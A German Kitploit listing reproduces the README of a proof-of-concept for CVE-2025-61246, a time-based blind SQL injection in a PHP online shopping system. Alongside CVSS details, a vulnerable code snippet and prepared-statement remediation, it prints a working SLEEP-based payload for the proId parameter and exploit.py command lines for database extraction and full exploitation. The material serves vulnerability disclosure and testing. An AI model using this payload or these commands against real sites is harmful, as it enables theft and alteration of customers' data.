Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-61246 — CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP | Kitploit
Tools/GitHubGitHub/hackergovind/cve-2025-61246
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-61246 - SQL-Injection-Schwachstelle im Online-Shopping-System

CVE Severity CVSS

Übersicht

Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2025-61246, eine kritische SQL-Injection-Schwachstelle, die in der PHP-Anwendung Online Shopping System entdeckt wurde. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige SQL-Befehle durch zeitbasierte blinde SQL-Injection auszuführen.

Schwachstellendetails

  • CVE-ID: CVE-2025-61246
  • Schwachstellentyp: SQL-Injection (zeitbasierte Blind)
  • Betroffene Komponente: /online-shopping-system-php-master/review_action.php
  • Betroffene Version: 1.0
  • Verwundbarer Parameter: proId
  • Angriffsvektor: Netzwerk (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • Schweregrad: Kritisch (CVSS-Score: 9.8)
  • Entdecker: Govind Pratap Singh

Technische Beschreibung

Die Schwachstelle existiert im Endpunkt review_action.php, bei dem die vom Benutzer bereitgestellte Eingabe aus dem Parameter proId direkt in SQL-Abfragen eingefügt wird, ohne ordnungsgemäße Bereinigung oder parametrisierte Abfragen. Dies ermöglicht es einem Angreifer, schädliche SQL-Payloads einzuschleusen, die Folgendes können:

  • Vertrauliche Datenbankinformationen extrahieren
  • Authentifizierungsmechanismen umgehen
  • Datenbankeinträge ändern oder löschen
  • Administrationsoperationen ausführen

Verwundbares Code-Muster

root@kitploit:~
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);

Angriffsvektoren

Ein Angreifer kann diese Schwachstelle ausnutzen, indem er:

  1. Eine manipulierte POST-Anfrage an /online-shopping-system-php-master/review_action.php sendet
  2. Einen schädlichen SQL-Payload im Parameter proId einfügt
  3. Zeitbasierte blinde SQL-Injection-Techniken verwendet, um Daten zu extrahieren
  4. Die Schwachstelle ausnutzt, um unbefugten Zugriff auf die Datenbank zu erhalten

Beispiel-Payload

root@kitploit:~
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -

Proof of Concept

Dieses Repository enthält:

  1. Automatisiertes Exploit-Skript (exploit.py) - Python-Skript zur Erkennung und Ausnutzung der Schwachstelle
  2. Manuelles Testhandbuch (MANUAL_TESTING.md) - Schritt-für-Schritt-Anleitung zur manuellen Ausnutzung
  3. Einrichtung der verwundbaren Anwendung (docker-compose.yml) - Docker-Umgebung für sicheres Testen
  4. Behebungsleitfaden (REMEDIATION.md) - Sichere Codierungspraktiken und Patches

Installation & Verwendung

Voraussetzungen

root@kitploit:~
Python 3.7+
pip install -r requirements.txt

Schnellstart

root@kitploit:~
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php

Erweiterte Nutzung

root@kitploit:~
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only

# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db

# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080

Auswirkungen

Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zu Folgendem führen:

  • Datenleck: Extraktion vertraulicher Benutzerinformationen, Anmeldedaten und Zahlungsdaten
  • Authentifizierungsumgehung: Unbefugter Zugriff auf administrative Funktionen
  • Datenmanipulation: Änderung oder Löschung kritischer Datenbankeinträge
  • Vollständige Systemkompromittierung: Potenzial für Remote-Code-Ausführung in bestimmten Konfigurationen

Behebung

Sofortmaßnahmen

  1. Eingabevalidierung anwenden: Strenge Eingabevalidierung für alle benutzergestellten Daten implementieren
  2. Parametrisierte Abfragen verwenden: Dynamisches SQL durch vorbereitete Anweisungen ersetzen
  3. WAF-Regeln implementieren: Regeln für Web Application Firewall bereitstellen, um SQL-Injection-Versuche zu blockieren
  4. Anwendung aktualisieren: Die neuesten Sicherheitspatches anwenden

Sicheres Code-Beispiel

root@kitploit:~
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();

Detaillierte Schritte zur Behebung finden Sie in REMEDIATION.md.

Referenzen

  • OWASP SQL Injection
  • CWE-89: SQL Injection

Haftungsausschluss

⚠️ WICHTIG: Dieser PoC dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch dieser Informationen. Holen Sie stets eine ordnungsgemäße Genehmigung ein, bevor Sie testen.

Autor

Govind Pratap Singh

  • GitHub: @hackergovind
  • E-Mail: [email protected]
  • Medium: https://medium.com/@govindsinghpratap123

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe LICENSE für Details.

Danksagungen

  • MITRE CVE-Zuordnungsteam
  • OWASP Foundation
  • Sicherheitsforschungsgemeinschaft

Verantwortungsvolle Offenlegung: Wenn Sie eine Sicherheitslücke entdecken, melden Sie diese bitte verantwortungsvoll an den Anbieter, bevor Sie sie öffentlich machen.

Tool herunterladen